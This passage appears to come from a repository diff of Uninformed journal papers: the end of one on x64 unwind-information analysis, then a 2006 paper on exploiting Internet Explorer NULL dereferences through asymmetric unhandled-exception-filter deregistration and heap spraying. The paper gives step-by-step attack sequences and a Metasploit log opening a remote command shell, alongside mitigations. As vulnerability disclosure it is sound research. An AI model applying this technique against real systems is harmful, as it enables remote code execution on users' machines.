task. Take the following unwind information obtained through dumpbin
/unwindinfo as an example:
0000060C 00006E50 00006FF0 000081FC _resetstkoflw
Unwind version: 1
Unwind flags: None
Size of prologue: 0x47
Count of codes: 18
Frame register: rbp
Frame offset: 0x20
Unwind codes:
3C: SAVE_NONVOL, register=r15 offset=0x98
38: SAVE_NONVOL, register=r14 offset=0xA0
31: SAVE_NONVOL, register=r13 offset=0xA8
2A: SAVE_NONVOL, register=r12 offset=0xD8
23: SAVE_NONVOL, register=rdi offset=0xD0
1C: SAVE_NONVOL, register=rsi offset=0xC8
15: SAVE_NONVOL, register=rbx offset=0xC0
0E: SET_FPREG, register=rbp, offset=0x20
09: ALLOC_LARGE, size=0xB0
02: PUSH_NONVOL, register=rbp
First and foremost, one can immediately see that the size of the
prologue used in the resetstkoflw function is 0x47 bytes. This prologue
accounts for all of the operations described in the unwind codes array.
Furthermore, one can also tell that the function uses a frame pointer,
as conveyed through rbp, and that the frame pointer offset is 0x20 bytes
relative to the current stack pointer at the time the frame pointer
register is established.
As one would expect with an unwind operation, the unwind codes
themselves are stored in the opposite order of which they are executed.
This is necessary because of the effect on the stack each unwind code
can have. If they are processed in the wrong order, then the unwind
operation will get invalid data. For example, the value obtained
through a pop rbp instruction will differ depending on whether or not it
is done before or after an add rsp, 0xb0.
For the purposes of annotation, however, the important thing to keep in
mind is how all of the useful information can be extracted. In this
case, it is possible to take all of the information the unwind codes
provide and break it down into a definition of the stack frame layout
for a function. This can be accomplished by processing the unwind codes
in the order that they would be executed rather than the order that they
appear in the array. There's one important thing to keep in mind when
doing this. Since unwind information can be chained, it is a
requirement that the full chain of unwind codes be processed in
execution order. This can be accomplished by walking the chain of
unwind information and building an execution order list of all of the
unwind codes.
Once the execution order list of unwind codes is collected, the next
step is to simply enumerate each code, checking to see what operation it
performs and building out the stack frame across each iteration. Prior
to enumerating each code, the state of the stack pointer should be
initialized to 0 to indicate an empty stack frame. As data is allocated
on the stack, the stack pointer should be adjusted by the appropriate
amount. The actions that need to be taken for each unwind operation
that directly effect the stack pointer are described below.
1. UWOP_PUSH_NONVOL
When a non-volatile register is pushed onto the stack, such as
through a push rbp, the current stack pointer needs to be
decremented by 8 bytes.
2. UWOP_ALLOC_LARGE and UWOP_ALLOC_SMALL
When stack space is allocated, the current stack pointer needs to
be adjusted by the amount indicated.
3. UWOP_SET_FPREG
When a frame pointer is defined, its offset relative to the base of
the stack should be saved using the current value of the stack
pointer.
As the enumeration unwind codes occurs, it is also possible to annotate
the different locations on the stack where non-volatile registers are
preserved. For instance, given the example unwind information above, it
is known that the R15 register is preserved at [rsp + 0x98]. Therefore,
we can annotate this location as [rsp + SavedR15].
Beyond annotating preserved register locations on the stack, we can also
annotate the instructions that perform operations that effect the stack.
For instance, when a non-volatile register is pushed, such as through
push rbp, we can annotate the instruction that performs that operation
as preserving rbp on the stack. The location of the instruction that's
associated with the operation can be determined by taking the
BeginAddress associated with the unwind information and adding it to the
CodeOffset attribute of the UNWIND_CODE that is being processed. It is
important to note, however, that the CodeOffset attribute actually
points to the first byte of the instruction immediately following the
one that performs the actual operation, so it is necessary to back track
in order to determine the start of the instruction that actually
performs the operation.
As a result of this analysis, one can take the prologue of the
resetstkoflw function and automatically convert it from:
.text:100006E50 push rbp
.text:100006E52 sub rsp, 0B0h
.text:100006E59 lea rbp, [rsp+0B0h+var_90]
.text:100006E5E mov [rbp+0A0h], rbx
.text:100006E65 mov [rbp+0A8h], rsi
.text:100006E6C mov [rbp+0B0h], rdi
.text:100006E73 mov [rbp+0B8h], r12
.text:100006E7A mov [rbp+88h], r13
.text:100006E81 mov [rbp+80h], r14
.text:100006E88 mov [rbp+78h], r15
to a version with better annotation:
.text:100006E50 push rbp ; SavedRBP
.text:100006E52 sub rsp, 0B0h
.text:100006E59 lea rbp, [rsp+20h]
.text:100006E5E mov [rbp+0A0h], rbx ; SavedRBX
.text:100006E65 mov [rbp+98h+SavedRSI], rsi ; SavedRSI
.text:100006E6C mov [rbp+98h+SavedRDI], rdi ; SavedRDI
.text:100006E73 mov [rbp+98h+SavedR12], r12 ; SavedR12
.text:100006E7A mov [rbp+98h+SavedR13], r13 ; SavedR13
.text:100006E81 mov [rbp+98h+SavedR14], r14 ; SavedR14
.text:100006E88 mov [rbp+98h+SavedR15], r15 ; SavedR15
While such annotation may is not entirely useful to understanding
the behavior of the binary, it at least simplifies the process of
understanding the layout of the stack.
4.1.3) Exception Handlers
The unwind information structure for a non-leaf function also contains
useful information about the way in which exceptions within that
function should be dispatched. If the unwind information associated
with a function has the UNW_FLAG_EHANDLER or UNW_FLAG_UHANDLER flag set,
then the function has an exception handler associated with it. The
exception handler is conveyed through the ExceptionHandler attribute
which comes immediately after the array of unwind codes. This handler is
defined as being a language-specific handler for processing the
exception. More specifically, the exception handler is specific to the
semantics associated with a given programming language, such as C or
C++[3]. For C, the language-specific exception handler is named
__C_specific_handler.
Given that all C functions that handle exceptions will have the same
exception handler, how does the function-specific code for handling an
exception actually get called? For the case of C functions, the
function-specific exception handler is stored in a scope table in the
ExceptionData portion of the UNWIND_INFO structure. Other languages may
have a different ExceptionData definition. This C scope table is defined
by the structures shown below:
typedef struct _C_SCOPE_TABLE_ENTRY {
ULONG Begin;
ULONG End;
ULONG Handler;
ULONG Target;
} C_SCOPE_TABLE_ENTRY, *PC_SCOPE_TABLE_ENTRY;
typedef struct _C_SCOPE_TABLE {
ULONG NumEntries;
C_SCOPE_TABLE_ENTRY Table[1];
} C_SCOPE_TABLE, *PC_SCOPE_TABLE;
The scope table entries describe the function-specific exception
handlers in relation to the specific areas of the function that they
apply to. Each of the attributes of the C_SCOPE_TABLE_ENTRY is expressed
as an RVA. The Target attribute defines the location to transfer
control to after the exception is handled.
The reason why all of the exception handler information is useful is
because it makes it possible to annotate a function in terms of what
exception handlers may be called during its execution. It also makes it
possible to identify the exception handler functions that may otherwise
not be found due to the fact that they are executed indirectly. For
example, the function CcAcquireByteRangeForWrite in ntoskrnl.exe can be
annotated in the following fashion:
.text:0000000000434520 ; Exception handler: __C_specific_handler
.text:0000000000434520 ; Language specific handler: sub_4C7F30
.text:0000000000434520
.text:0000000000434520 CcAcquireByteRangeForWrite proc near
4.2) Register Parameter Area Annotation
Given the requirement that the register parameter area be allocated on
the stack in the context of a function that calls other functions, it is
possible to statically annotate specific portions of the stack frame for
a function as being the location of the caller's register parameter
area. Furthermore, the location of a given function's register
parameter area that is to be used by called functions can also be
annotated.
The location of the register parameter area is always at a fixed
location in a stack frame. Specifically, it immediately follows the
return address on the stack. If annotations are added for CallerRCX at
offset 0x8, CallerRDX at offset 0x10, CallerR8 at offset 0x18, and
CallerR9 at offset 0x20, it is possible to get a better view of the
stack frame for a given function. It also makes it easier to understand
when and how this region of the stack is used by a function. For
instance, the CcAcquireByteRangeForWrite function in ntoskrnl.exe makes
use of this area to store the values of the first four parameters:
.text:0000000000434520 mov [rsp+CallerR9], r9
.text:0000000000434525 mov dword ptr [rsp+CallerR8], r8d
.text:000000000043452A mov [rsp+CallerRDX], rdx
.text:000000000043452F mov [rsp+CallerRCX], rcx
5) Conclusion
This paper has presented a few basic approaches that can be used to
extract useful information from an x64 binary for the purpose of
analysis. By analyzing the unwind information associated with
functions, it is possible to get a better understanding for how a
function's stack frame is laid out. Furthermore, the unwind information
makes it possible to describe the relationship between a function and
its exception handler(s). Looking toward the future, x64 is likely to
become the standard architecture given Microsoft's adoption of it as
their primary architecture. With this in mind, coming up with
techniques to better automate the binary analysis process will become
more necessary.
Bibliography
[1] Microsoft Corporation. ntimage.h.
3790 DDK header files.
[2] Microsoft Corporation. Exception Handling (x64).
http://msdn2.microsoft.com/en-us/library/1eyas8tf(VS.80).aspx;
accessed Apr 25, 2006.
[3] Microsoft Corporation. The Language Specific Handler.
http://msdn2.microsoft.com/en-us/library/b6sf5kbd(VS.80).aspx;
accessed Apr 25, 2006.
[4] Microsoft Corporation. Parameter Passing.
http://msdn2.microsoft.com/en-us/library/zthk2dkh.aspx;
accessed Apr 25, 2006.
[5] Microsoft Corporation. Register Usage.
http://msdn2.microsoft.com/en-us/library/9z1stfyw(VS.80).aspx;
accessed Apr 25, 2006.
[6] Microsoft Corporation. SEH in x86 Environments.
http://msdn2.microsoft.com/en-US/library/ms253960.aspx;
accessed Apr 25, 2006.
[7] Microsoft Corporation. Stack Usage.
http://msdn2.microsoft.com/en-us/library/ew5tede7.aspx;
accessed Apr 25, 2006.
[8] Microsoft Corporation. Unwind Data Definitions in C.
http://msdn2.microsoft.com/en-us/library/ssa62fwe(VS.80).aspx;
accessed Apr 25, 2006.

711
uninformed/4.5.txt Normal file
View File

@ -0,0 +1,711 @@
Exploiting the Otherwise Unexploitable on Windows
skywing, skape
May 2006
1) Foreword
Abstract: This paper describes a technique that can be applied in
certain situations to gain arbitrary code execution through software
bugs that would not otherwise be exploitable, such as NULL pointer
dereferences. To facilitate this, an attacker gains control of the
top-level unhandled exception filter for a process in an indirect
fashion. While there has been previous work [1, 3] illustrating the
usefulness in gaining control of the top-level unhandled exception
filter, Microsoft has taken steps in XPSP2 and beyond, such as function
pointer encoding[4], to prevent attackers from being able to overwrite
and control the unhandled exception filter directly. While this
security enhancement is a marked improvement, it is still possible for
an attacker to gain control of the top-level unhandled exception filter
by taking advantage of a design flaw in the way unhandled exception
filters are chained. This approach, however, is limited by an attacker's
ability to control the chaining of unhandled exception filters, such as
through the loading and unloading of DLLs. This does reduce the global
impact of this approach; however, there are some interesting cases where
it can be immediately applied, such as with Internet Explorer.
Disclaimer: This document was written in the interest of education. The
authors cannot be held responsible for how the topics discussed in this
document are applied.
Thanks: The authors would like to thank H D Moore, and everyone who
learns because it's fun.
Update: This issue has now been addressed by the patch included in
MS06-051. A complete analysis has not yet been performed to ensure that
it patches all potential vectors.
With that, on with the show...
2) Introduction
In the security field, software bugs can be generically grouped into two
categories: exploitable or non-exploitable. If a software bug is
exploitable, then it can be leveraged to the advantage of the attacker,
such as to gain arbitrary code execution. However, if a software bug is
non-exploitable, then it is not possible for the attacker to make use of
it for anything other than perhaps crashing the application. In more
cases than not, software bugs will fall into the category of being
non-exploitable simply because they typically deal with common mistakes
or invalid assumptions that are not directly related to buffer
management or loop constraints. This can be frustrating during auditing
and product analysis from an assessment standpoint. With that in mind,
it only makes sense to try think of ways to turn otherwise
non-exploitable issues into exploitable issues.
In order to accomplish this feat, it's first necessary to try to
consider execution vectors that could be redirected to code that the
attacker controls after triggering a non-exploitable bug, such as a NULL
pointer dereference. For starters, it is known that the triggering of a
NULL pointer dereference will cause an access violation exception to be
dispatched. When this occurs, the user-mode exception dispatcher will
call the registered exception handlers for the thread that generated the
exception, allowing each the opportunity to handle the exception. If
none of the exception handlers know what to do with it, the user-mode
exception dispatcher will call the top-level unhandled exception filter
(UEF) via kernel32!UnhandledExceptionFilter (if one has been set). The
implementation of a function that is set as the registered top-level UEF
is not specified, but in most cases it will be designed to pass
exceptions that it cannot handle onto the top-level UEF that was
registered previously, effectively creating a chain of UEFs. This
process will be explained in more detail in the next chapter.
Aside from the exception dispatching process, there are not any other
controllable execution vectors that an attacker might be able to
redirect without some other situation-specific conditions. For that
reason, the most important place to look for a point of redirection is
within the exception dispatching process itself. This will provide a
generic means of gaining execution control for any bug that can be made
to crash an application.
Since the first part of the exception dispatching process is the calling
of registered exception handlers for the thread, it may make sense to
see if there are any controllable execution paths taken by the
registered exception handlers at the time that the exception is
triggered. This may work in some cases, but is not universal and
requires analysis of the specific exception handler routines. Without
having an ability to corrupt the list of exception handlers, there is
likely to be no other method of redirecting this phase of the exception
dispatching process.
If none of the registered exception handlers can be redirected, one must
look toward a method that can be used to redirect the unhandled
exception filter. This could be accomplished by changing the function
pointer to call into controlled code as illustrated in[1,3]. However,
Microsoft has taken steps in XPSP2, such as encoding the function
pointer that represents the top-level UEF[4]. This no longer makes it
feasible to directly overwrite the global variable that contains the
top-level UEF. With that in mind, it may also make sense to look at the
function associated with top-level UEF at the time that the exception is
dispatched in order to see if the function itself has any meaningful way
to redirect its execution.
From this initial analysis, one is left with being required to perform
an application-dependent analysis of the registered exception handlers
and UEFs that exist at the time that the exception is dispatched. Though
this may be useful in some situations, they are likely to be few and far
between. For that reason, it makes sense to try to dive one layer
deeper to learn more about the exception dispatching process. Chapter
will describe in more detail how unhandled exception filters work,
setting the stage for the focus of this paper. Based on that
understanding, chapter will expound upon an approach that can be used
to gain indirect control of the top-level UEF. Finally, chapter will
formalize the results of this analysis in an example of a working
exploit that takes advantage of one of the many NULL pointer
dereferences in Internet Explorer to gain arbitrary code execution.
3) Understanding Unhandled Exception Filters
This chapter provides an introductory background into the way unhandled
exception filters are registered and how the process of filtering an
exception that is not handled actually works. This information is
intended to act as a base for understanding the attack vector described
in chapter . If the reader already has sufficient understanding of the
way unhandled exception filters operate, feel free to skip ahead.
3.1) Setting the Top-Level UEF
In order to make it possible for applications to handle all exceptions
on a process-wide basis, the exception dispatcher exposes an interface
for registering an unhandled exception filter. The purpose of the
unhandled exception filter is entirely application specific. It can be
used to log extra information about an unhandled exception, perform some
advanced error recovery, handle language-specific exceptions, or any
sort of other task that may need to be taken when an exception occurs
that is not handled. To specify a function that should be used as the
top-level unhandled exception filter for the process, a call must be
made to kernel32!SetUnhandledExceptionFilter which is prototyped as[6]:
LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter(
LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter
);
When called, this function will take the function pointer passed in as
the lpTopLevelExceptionFilter argument and encode it using
kernel32!RtlEncodePointer. The result of the encoding will be stored in
the global variable kernel32!BasepCurrentTopLevelFilter, thus
superseding any previously established top-level filter. The previous
value stored within this global variable is decoded using
kernel32!RtlDecodePointer and returned to the caller. Again, the
encoding and decoding of this function pointer is intended to prevent
attackers from being able to use an arbitrary memory overwrite to
redirect it as has been done pre-XPSP2.
There are two reasons that kernel32!SetUnhandledExceptionFilter returns
a pointer to the original top-level UEF. First, it makes it possible to
restore the original top-level UEF at some point in the future. Second,
it makes it possible to create an implicit ``chain'' of UEFs. In this
design, each UEF can make a call down to the previously registered
top-level UEF by doing something like the pseudo code below:
... app specific handling ...
if (!IsBadCodePtr(PreviousTopLevelUEF))
return PreviousTopLevelUEF(ExceptionInfo);
else
return EXCEPTION_CONTINUE_SEARCH;
When a block of code that has registered a top-level UEF wishes to
deregister itself, it does so by setting the top-level UEF to the value
that was returned from its call to kernel32!SetUnhandledExceptionFilter.
The reason it does it this way is because there is no true list of
unhandled exception filters that is maintained. This method of
deregistering has one very important property that will serve as the
crux of this document. Since deregistration happens in this fashion,
the register and deregister operations associated with a top-level UEF
must occur in symmetric order.
In one example, the top-level UEF Fx is registered, returning Nx as the
previous top-level UEF. Following that, Gx is registered, returning Fx
as the previous value. After some period of time, Gx is deregistered by
setting Fx as the top-level UEF, thus returning the top-level UEF to the
value it contained before Gx was registered. Finally, Fx deregisters by
setting Nx as the top-level UEF.
3.2) Handling Unhandled Exceptions
When an exception goes through the initial phase of the exception
dispatching process and is not handled by any of the registered
exception handlers for the thread that the exception occurred in, the
exception dispatcher must take one final stab at getting it handled
before forcing the application to terminate. One of the options the
exception dispatcher has at this point is to pass the exception to a
debugger, assuming one is attached. Otherwise, it has no choice but to
try to handle the exception internally and abort the application if that
fails. To allow this to happen, applications can make a call to the
unhandled exception filter associated with the process as described in [5].
In the general case, calling the unhandled exception filter will result
in kernel32!UnhandledExceptionFilter being called with information about
the exception being dispatched.
The job of kernel32!UnhandledExceptionFilter is two fold. First, if a
debugger is not present, it must make a call to the top-level UEF
registered with the process. The top-level UEF can then attempt to
handle the exception, possibly recovering and allowing execution to
continue, such as by returning EXCEPTION_CONTINUE_EXECUTION. Failing
that, it can either forcefully terminate the process, typically by
returning EXCEPTION_EXECUTE_HANDLER or allow the normal error reporting
dialog to be displayed by returning EXCEPTION_CONTINUE_SEARCH. If a
debugger is present, the unhandled exception filter will attempt to pass
the exception on to the debugger in order to give it a chance to handle
the exception. When this occurs, the top-level UEF is not called. This
is important to remember as the paper goes on, as it can be a source of
trouble if one forgets this fact.
When operating with no debugger present,
kernel32!UnhandledExceptionFilter will attempt to decode the function
pointer associated with the top-level UEF by calling
kernel32!RtlDecodePointer on the global variable that contains the
top-level UEF, kernel32!kernel32!BasepCurrentTopLevelFilter, as shown
below:
7c862cc1 ff35ac33887c push dword ptr [kernel32!BasepCurrentTopLevelFilter]
7c862cc7 e8e1d6faff call kernel32!RtlDecodePointer (7c8103ad)
If the value returned from kernel32!RtlDecodePointer is not NULL, then a
call is made to the now-decoded top-level UEF function, passing the
exception information on:
7c862ccc 3bc7 cmp eax,edi
7c862cce 7415 jz kernel32!UnhandledExceptionFilter+0x15b (7c862ce5)
7c862cd0 53 push ebx
7c862cd1 ffd0 call eax
The return value of the filter will control whether or not the
application continues execution, terminates, or reports an error and
terminates.
3.3) Uses for Unhandled Exception Filters
In most cases, unhandled exception filters are used for
language-specific exception handling. This usage is all done
transparently to programmers of the language. For instance, C++ code
will typically register an unhandled exception filter through
CxxSetUnhandledExceptionFilter during CRT initialization as called from
the entry point associated with the program or shared library.
Likewise, C++ will typically deregister the unhandled exception filter
that it registers by calling CxxRestoreUnhandledExceptionFilter during
program termination or shared library unloading.
Other uses include programs that wish to do advanced error reporting or
information collection prior to allowing an application to terminate due
to an unhandled exception.
4) Gaining Control of the Unhandled Exception Filter
At this point, the only feasible vector for gaining control of the
top-level UEF is to cause calls to be made to
kernel32!SetUnhandledExceptionFilter. This is primarily due to the fact
that the global variable has the current function pointer encoded. One
could consider attempting to cause code to be redirected directly to
kernel32!SetUnhandledExceptionFilter, but doing so would require some
kind of otherwise-exploitable vulnerability in an application, thus
making it not useful in the context of this document.
Given these restrictions, it makes sense to think a little bit more
about the process involved in registering and deregistering UEFs. Since
the chain of registered UEFs is implicit, it may be possible to cause
that chain to become corrupt or invalid in some way that might be
useful. One of the requirements that is known about the registration
process for top-level UEFs is that the register and deregister
operations must be symmetric. What happens if they aren't, though?
Consider the following example where Fx and Gx are registered and
deregistered, but in asymmetric order.
In this example, Fx and Gx are registered first. Following that, Fx is
deregistered prior to deregistering Gx, thus making the operation
asymmetrical. As a result of Fx deregistering first, the top-level UEF
is set to Nx, even though Gx should technically still be a part of the
chain. Finally, Gx deregisters, setting the top-level UEF to Fx even
though Fx had been previously deregistered. This is obviously incorrect
behavior, but the code associated with Gx has no idea that Fx has been
deregistered due to the implicit chain that is created.
If asymmetric registration of UEFs can be made to occur, it might be
possible for an attacker to gain control of the top-level UEF. Consider
for a moment that the register and deregister operations in the diagram
in figure occur during DLL load and unload, respectively. If that is
the case, then after deregistration occurs, the DLLs associated with the
UEFs will be unloaded. This will leave the top-level UEF set to Fx
which now points to an invalid region of memory. If an exception occurs
after this point and is not handled by a registered exception handler,
the unhandled exception filter will be called. If a debugger is not
attached, the top-level UEF Fx will be called. Since Fx points to
memory that is no longer associated with the DLL that contained Fx, the
process will terminate --- or worse.
From a security prospective, the act of leaving a dangling function
pointer that now points to unallocated memory can be a dream come true.
If a scenario such as this occurs, an attacker can attempt to consume
enough memory that will allow them to store arbitrary code at the
location that the function originally resided. In the event that the
function is called, the attacker's arbitrary code will be executed
rather than the code that was was originally at that location. In the
case of the top-level UEF, the only thing that an attacker would need to
do in order to cause the function pointer to be called is to generate an
unhandled exception, such as a NULL pointer dereference.
All of these details combine to provide a feasible vector for executing
arbitrary code. First, it's necessary to be able to cause at least two
DLLs that set UEFs to be deregistered asymmetrically, thus leaving the
top-level UEF pointing to invalid memory. Second, it's necessary to
consume enough memory that attacker controlled code can reside at the
location that one of the UEF functions originally resided. Finally, an
exception must be generated that causes the top-level UEF to be called,
thus executing the attacker's arbitrary code.
The big question, though, is how feasible is it to really be able to
control the registering and deregistering of UEFs? To answer that,
chapter provides a case study on one such application where it's all
too possible: Internet Explorer.
5) Case Study: Internet Explorer
Unfortunately for Internet Explorer, it's time for it to once again dawn
the all-too-exploitable hat and tell us about how it can be used as a
medium to gain arbitrary code execution with all otherwise
non-exploitable bugs. In this approach, Internet Explorer is used as a
medium for causing DLLs that register and deregister top-level UEFs to
be loaded and unloaded. One way in which an attacker can accomplish
this is by using Internet Explorer's facilities for instantiating COM
objects from within the browser. This can be accomplished either by
using the new ActiveXObject construct in JavaScript or by using the HTML
OBJECT tag.
In either case, when a COM object is being instantiated, the DLL
associated with that COM object will be loaded into memory if the object
instance is created using the INPROC_SERVER. When this happens, the COM
object's DllMain will be called. If the DLL has an unhandled exception
filter, it may be registered during CRT initialization as called from
the DLL's entry point. This takes care of the registering of UEFs, so
long as COM objects that are associated with DLLs that set UEFs can be
found.
To control the deregister phase, it is necessary to somehow cause the
DLLs associated with the previously instantiated COM objects to be
unloaded. One approach that can be taken to do this is attempt to
leverage the locations that ole32!CoFreeUnusedLibrariesEx is called
from. One particular place that it's called from is during the closure
of an Internet Explorer window that once hosted the COM object. When
this function is called, all currently loaded COM DLLs will have their
DllCanUnloadNow routines called. If the routine returns SOK, such as
when there are no outstanding references to COM objects hosted by the
DLL, then the DLL can be unloaded.
Now that techniques for controlling the loading and unloading of DLLs
that set UEFs has been identified, it's necessary to come up with an
implementation that will allow the deregister phase to occur
asymmetrically. One method that can be used to accomplish this
illustrated by the registration phase and the deregistration
phase described below.
Registration:
1. Open window #1
2. Instantiate COMObject1
3. Load DLL 1
4. SetUnhandledExceptionFilter(Fx) => Nx
5. Open window #2
6. Instantiate COMObject2
7. Load DLL 2
8. SetUnhandledExceptionFilter(Gx) => Fx
In the example described above, two windows are opened, each of which
registers a UEF by way of a DLL that implements a specific COM object.
In this example, the first window instantiates COMObject1 which is
implemented by DLL 1. When DLL 1 is loaded, it registers a top-level
UEF Fx. Once that completes, the second window is opened which
instantiates COMObject2, thus causing DLL 2 to be loaded which also
registers a top-level UEF, Gx. Once these operations complete, DLL 1
and DLL 2 are still resident in memory and the top-level UEF points to
Gx.
To gain control of the top-level UEF, Fx and Gx will need to be
deregistered asymmetrically. To accomplish this, DLL 1 must be unloaded
before DLL 2. This can be done by closing the window that hosts
COMObject1, thus causing ole32!CoFreeUnusedLibrariesEx to be called
which results in DLL 1 being unloaded. Following that, the window that
hosts COMObject2 should be closed, once again causing unused libraries
to be freed and DLL 2 unloaded. The diagram below illustrates this process.
Deregistration:
1. Close window #1
2. CoFreeUnusedLibrariesEx
3. Unload DLL 1
4. SetUnhandledExceptionFilter(Nx) => Gx
5. Close window #2
6. CoFreeUnusedLibrariesEx
7. Unload DLL 2
8. SetUnhandledExceptionFilter(Fx) => Nx
After the process in figure completes, Fx will be the top-level UEF for
the process, even though the DLL that hosts it, DLL 1, has been
unloaded. If an exception occurs at this point in time, the unhandled
exception filter will make a call to a function that now points to an
invalid region of memory.
At this point, an attacker now has reasonable control over the top-level
UEF but is still in need of some approach that can used to place his or
her code at the location that Fx resided at. To accomplish this,
attackers can make use of the heap-spraying[8, 7] technique that has been
commonly applied to browser-based vulnerabilities. The purpose of the
heap-spraying technique is to consume an arbitrary amount of memory that
results in the contents of the heap growing toward a specific address
region. The contents, or spray data, is arbitrary code that will result
in an attacker's direct or indirect control of execution flow once the
vulnerability is triggered. For the purpose of this paper, the trigger
is the generation of an arbitrary exception.
As stated above, the heap-spraying technique can be used to place code
at the location that Fx resided. However, this is limited by whether or
not that location is close enough to the heap to be a practical target
for heap-spraying. In particular, if the heap is growing from
0x00480000 and the DLL that contains Fx was loaded at 0x7c800000, it
would be a requirement that roughly 1.988 GB of data be placed in the
heap. That is, of course, assuming that the target machine has enough
memory to contain this allocation (across RAM and swap). Not to mention
the fact that spraying that much data could take an inordinate amount of
time depending on the speed of the machine. For these reasons, it is
typically necessary for the DLL that contains Fx in this example
scenario to be mapped at an address that is as close as possible to a
region that the heap is growing from.
During the research of this attack vector, it was found that all of the
COM DLLs provided by Microsoft on XPSP2 are compiled to load at higher
addresses which make them challenging to reach with heap-spraying, but
it's not impossible. Many 3rd party COM DLLs, however, are compiled
with a default load address of 0x00400000, thus making them perfect
candidates for this technique. Another thing to keep in mind is that
the preferred load address of a DLL is just that: preferred. If two
DLLs have the same preferred load address, or their mappings would
overlap, then obviously one would be relocated to a new location,
typically at a lower address close to the heap, when it is loaded. By
keeping this fact in mind, it may be possible to load DLLs that overlap,
forcing relocation of a DLL that sets a UEF that would otherwise be
loaded at a higher address.
It is also very important to note that a COM object does not have to be
successfully instantiated for the DLL associated with it to be loaded
into memory. This is because in order for Internet Explorer to
determine whether or not the COM class can be created and is compatible
with one that may be used from Internet Explorer, it must load and query
various COM interfaces associated with the COM class. This fact is very
useful because it means that any DLL that hosts a COM object can be used
--- not just ones that host COM objects that can be successfully
instantiated from Internet Explorer.
The culmination of all of these facts is a functional proof of concept
exploit for Windows XP SP2 and the latest version of Internet Explorer
with all patches applied prior to MS06-051. Its one requirement is that
the target have Adobe Acrobat installed. Alternatively, other 3rd party
(or even MS provided DLLs) can be used so long as they can be feasibly
reached with heap-spraying techniques. Technically speaking, this proof
of concept exploits a NULL pointer dereference to gain arbitrary code
execution. It has been implemented as an exploit module for the 3.0
version of the Metasploit Framework.
The following example shows this proof of concept in action:
msf exploit(windows/browser/ie_unexpfilt_poc) > exploit
[*] Started reverse handler
[*] Using URL: http://x.x.x.x:8080/FnhWjeVOnU8NlbAGAEhjcjzQWh17myEK1Exg0
[*] Server started.
[*] Exploit running as background job.
msf exploit(windows/browser/ie_unexpfilt_poc) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (x.x.x.x:4444 -> y.y.y.y:1059)
msf exploit(windows/browser/ie_unexpfilt_poc) > session -i 1
[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\mmiller\Desktop>
6) Mitigation Techniques
In the interest of not presenting a problem without a solution, the authors
have devised a few different approaches that might be taken by Microsoft to
solve this issue. Prior to identifying the solution, it is important to
summarize the root of the problem. In this case, the authors feel that the
problem at hand is rooted around a design flaw with the way the unhandled
exception filter ``chain'' is maintained. In particular, the ``chain''
management is an implicit thing which hinges on the symmetric registering and
deregistering of unhandled exception filters. In order to solve this design
problem, some mechanism must be put in place that will eliminate the
symmetrical requirement. Alternatively, the symmetrical requirement could be
retained so long as something ensured that operations never occurred out of
order. The authors feel that this latter approach is more complicated and
potentially not feasible. The following sections will describe a few different
approaches that might be used or considered to solve this issue.
Aside from architecting a more robust implementation, this attack vector may
also be mitigated through conventional exploitation counter-measures, such as
NX and ASLR.
6.1) Behavioral Change to SetUnhandledExceptionFilter
One way in which Microsoft could solve this issue would be to change the
behavior of kernel32!SetUnhandledExceptionFilter in a manner that allows it to
support true registration and deregistration operations rather than implicit
ones. This can be accomplished by making it possible for the function to
determine whether a register operation is occurring or whether a deregister
operation is occurring.
Under this model, when a registration operation occurs,
kernel32!SetUnhandledExceptionFilter can return a dynamically generated context
that merely calls the routine that is previous to the one that was registered.
The fact that the context is dynamically generated makes it possible for the
function to distinguish between registrations and deregistrations. When the
function is called with a dynamically generated context, it can assume that a
deregistration operation os occurring. Otherwise, it must assume that a
registration operation is occurring.
To ensure that the underlying list of registered UEFs is not corrupted,
kernel32!SetUnhandledExceptionFilter can be modified to ensure that when a
deregistration operation occurs, any dynamically generated contexts that
reference the routine being deregistered can be updated to call to the
next-previous routine, if any, or simply return if there is no longer a
previous routine.
6.2) Prevent Setting of non-image UEF
One approach that could be used to solve this issue for the general case is the
modification of kernel32!SetUnhandledExceptionFilter to ensure that the
function pointer being passed in is associated with an image region. By adding
this check at the time this function is called, the attack vector described in
this document can be mitigated. However, doing it in this manner may have
negative implications for backward compatibility. For instance, there are
likely to be cases where this scenario happens completely legitimately without
malicious intent. If a check like this were to be added, a once-working
application would begin to fail due to the added security checks. This is not
an unlikely scenario. Just because an unhandled exception filter is is invalid
doesn't mean that it will eventually cause the application to crash because it
may, in fact, never be executed.
6.3) Prevent Execution of non-image UEF
Like preventing the setting of a non-image UEF, it may also be
possible to to modify kernel32!UnhandledExceptionFilter to prevent execution of
the top-level UEF if it points to a non-image region. While this seems like it
would be a useful check and should solve the issue, the fact is that it does
not. Consider the scenario where a top-level UEF is set to an invalid address
due to asymmetric deregistration. Following that, the top-level UEF is set to
a new value which is the location of a valid function. After this point, if an
unhandled exception is dispatched, kernel32!UnhandledExceptionFilter will see
that the top-level UEF points to a valid image region and as such will call it.
However, the top-level UEF may be implemented in such a way that it will pass
exceptions that it cannot handle onto the previously registered top-level UEF.
When this occurs, the invalid UEF is called which may point to arbitrary code
at the time that it's executed. The fact that
kernel32!UnhandledExceptionFilter can filter non-image regions does not solve
the fact that uncontrolled UEFs may pass exceptions on up the chain.
7) Future Research
With the technique identified for being able to control the top-level UEF by
taking advantage of asymmetric deregistration, future research can begin to
identify better ways in which to accomplish this. For instance, rather than
relying on child windows in Internet Explorer, there may be another vector
through which ole32!CoFreeUnusuedLibrariesEx can be called to cause the
asymmetric deregistration to occur By default, ole32!CoFreeUnusedLibrariesEx is
called every ten minutes, but this fact is not particulary useful in terms of
general exploitation. There may also be better and more refined techniques that
can be used to more accurately spray the heap in order to place arbitrary code
at the location that a defunct top-level UEF resided at.
Aside from improving the technique itself, it is also prudent to consider other
software applications this could be affected by this. In most cases, this
technique will not be feasible due to an attacker's inability to control the
loading and unloading of DLLs. However, should a mechanism for accomplishing
this be exposed, it may indeed be possible to take advantage of this.
One such target software application that the authors find most intriguing
would be IIS. If it were possible for a remote attacker to cause DLLs that use
UEFs to be loaded and unloaded in a particular order, such as by accessing
websites that load COM objects, then it may be possible for an attacker to
leverage this vector on a remote webserver. At the time of this writing, the
only approach that the authors are aware of that could permit this are remote
debugging features present in ASP.NET that allow for the instantiation of COM
